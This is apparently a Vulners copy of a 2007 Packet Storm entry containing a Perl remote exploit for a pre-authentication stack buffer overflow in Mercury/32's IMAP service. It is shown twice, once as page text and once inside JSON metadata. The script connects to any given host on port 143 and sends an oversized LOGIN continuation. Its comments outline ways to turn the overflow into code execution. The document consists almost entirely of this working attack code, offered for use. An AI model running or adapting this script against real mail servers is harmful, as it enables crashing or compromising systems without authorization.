Search...

mercurypown-v1.pl.txt

2007-03-09T00:00:00

ID PACKETSTORM:54937
Type packetstorm
Reporter mu-b
Modified 2007-03-09T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#  
# mercurypown-v1.pl  
#  
# Mercury/32 &lt;v4.01b (win32) remote exploit  
# by mu-b - 28 Nov 2006  
#  
# - Tested on: Mercury/32 v4.01a (win32)  
# Mercury/32 v4.01b (win32)  
#  
# Stack-based buffer overflow caused by Mercury/32 concatenating  
# continuation data into a fixed sized buffer disregarding  
# the length of the original command, you do not require authentication.  
#  
# This is a little harder to exploit than usual since the  
# stack frame in question calls end_thread before returning..  
# buts it's still possible by at *least* two different ways...  
# (i.e. controlling a pointer into sprintf and/or controlling  
# a pointer to be free()).  
#  
########  
  
use Getopt::Std; getopts('t:n:', \%arg);  
use Socket;  
  
&print_header;  
  
my $target;  
  
if (defined($arg{'t'})) { $target = $arg{'t'} }  
if (!(defined($target))) { &usage; }  
  
my $imapd_port = 143;  
my $send_delay = 1;  
  
my $NOP = 'A';  
my $LEN = 9200;#8928;  
my $BUFLEN = 8192;  
  
if (connect_host($target, $imapd_port)) {  
print("-&gt; * Connected\n");  
$buf = "1 LOGIN".(" "x($LEN-$BUFLEN))."\{255\}\n";  
send(SOCKET, $buf, 0);  
sleep($send_delay);  
  
print("-&gt; * Sending payload\n");  
$buf = $NOP x 255;  
send(SOCKET, $buf, 0);  
sleep($send_delay);  
  
print("-&gt; * Sending payload 2\n");  
$buf = $NOP x $BUFLEN;  
send(SOCKET, $buf, 0);  
sleep($send_delay);  
  
print("-&gt; * Successfully sent payload!\n");  
}  
  
sub print_header {  
print("Mercury/32 &lt;v4.01b (win32) remote exploit\n");  
print("by: &lt;mu-b\@digit-labs.org&gt;\n\n");  
}  
  
sub usage {  
print(qq(Usage: $0 -t &lt;hostname&gt;  
  
-t &lt;hostname&gt; : hostname to test  
));  
  
exit(1);  
}  
  
sub connect_host {  
($target, $port) = @_;  
$iaddr = inet_aton($target) || die("Error: $!\n");  
$paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n");  
$proto = getprotobyname('tcp') || die("Error: $!\n");  
  
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");  
connect(SOCKET, $paddr) || die("Error: $!\n");  
return(1337);  
}  
`

JSON Vulners Source

Initial Source

{"type": "packetstorm", "published": "2007-03-09T00:00:00", "reporter": "mu-b", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "147cf471f2145fbb74c3c5f4e8cd40f1"}, {"key": "modified", "hash": "10f8942b49a73e00d537e1a2b5ad2294"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "10f8942b49a73e00d537e1a2b5ad2294"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "8b49420069041b40ada7a0b8795c0fec"}, {"key": "sourceData", "hash": "5f4604d6884e76ca4e9cef34a8976508"}, {"key": "sourceHref", "hash": "2ae6d4feb8f9e731d6def790a9cfd75c"}, {"key": "title", "hash": "99b3617d7ac25c13d9ebd614a52baaeb"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`#!/usr/bin/perl \n# \n# mercurypown-v1.pl \n# \n# Mercury/32 <v4.01b (win32) remote exploit \n# by mu-b - 28 Nov 2006 \n# \n# - Tested on: Mercury/32 v4.01a (win32) \n# Mercury/32 v4.01b (win32) \n# \n# Stack-based buffer overflow caused by Mercury/32 concatenating \n# continuation data into a fixed sized buffer disregarding \n# the length of the original command, you do not require authentication. \n# \n# This is a little harder to exploit than usual since the \n# stack frame in question calls end_thread before returning.. \n# buts it's still possible by at *least* two different ways... \n# (i.e. controlling a pointer into sprintf and/or controlling \n# a pointer to be free()). \n# \n######## \n \nuse Getopt::Std; getopts('t:n:', \\%arg); \nuse Socket; \n \n&print_header; \n \nmy $target; \n \nif (defined($arg{'t'})) { $target = $arg{'t'} } \nif (!(defined($target))) { &usage; } \n \nmy $imapd_port = 143; \nmy $send_delay = 1; \n \nmy $NOP = 'A'; \nmy $LEN = 9200;#8928; \nmy $BUFLEN = 8192; \n \nif (connect_host($target, $imapd_port)) { \nprint(\"-> * Connected\\n\"); \n$buf = \"1 LOGIN\".(\" \"x($LEN-$BUFLEN)).\"\\{255\\}\\n\"; \nsend(SOCKET, $buf, 0); \nsleep($send_delay); \n \nprint(\"-> * Sending payload\\n\"); \n$buf = $NOP x 255; \nsend(SOCKET, $buf, 0); \nsleep($send_delay); \n \nprint(\"-> * Sending payload 2\\n\"); \n$buf = $NOP x $BUFLEN; \nsend(SOCKET, $buf, 0); \nsleep($send_delay); \n \nprint(\"-> * Successfully sent payload!\\n\"); \n} \n \nsub print_header { \nprint(\"Mercury/32 <v4.01b (win32) remote exploit\\n\"); \nprint(\"by: <mu-b\\@digit-labs.org>\\n\\n\"); \n} \n \nsub usage { \nprint(qq(Usage: $0 -t <hostname> \n \n-t <hostname> : hostname to test \n)); \n \nexit(1); \n} \n \nsub connect_host { \n($target, $port) = @_; \n$iaddr = inet_aton($target) || die(\"Error: $!\\n\"); \n$paddr = sockaddr_in($port, $iaddr) || die(\"Error: $!\\n\"); \n$proto = getprotobyname('tcp') || die(\"Error: $!\\n\"); \n \nsocket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die(\"Error: $!\\n\"); \nconnect(SOCKET, $paddr) || die(\"Error: $!\\n\"); \nreturn(1337); \n} \n`\n", "viewCount": 0, "history": [], "lastseen": "2016-11-03T10:18:42", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/54937/mercurypown-v1.pl.txt.html", "sourceHref": "https://packetstormsecurity.com/files/download/54937/mercurypown-v1.pl.txt", "title": "mercurypown-v1.pl.txt", "enchantments": {"vulnersScore": 7.5}, "references": [], "id": "PACKETSTORM:54937", "hash": "e6b908f319b48f5db3e098e582c4a23fd8d86b716d47e27ebb60b9b9dcb493cc", "edition": 1, "cvelist": [], "modified": "2007-03-09T00:00:00", "description": ""}